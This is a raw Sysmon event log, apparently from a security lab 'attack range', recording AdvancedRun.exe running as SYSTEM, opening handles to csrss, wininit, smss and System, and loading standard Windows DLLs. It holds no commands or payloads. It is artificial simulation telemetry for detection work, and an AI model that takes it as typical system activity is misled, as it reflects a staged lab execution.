20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078587Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078586Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078585Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.892{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004078583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.892{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004078581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.892{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.881{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004078579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.870{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.864{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.858{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.858{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.857{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.848{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.848{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.847{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.847{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.846{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.846{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078552Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.843{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078551Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.842{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078550Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 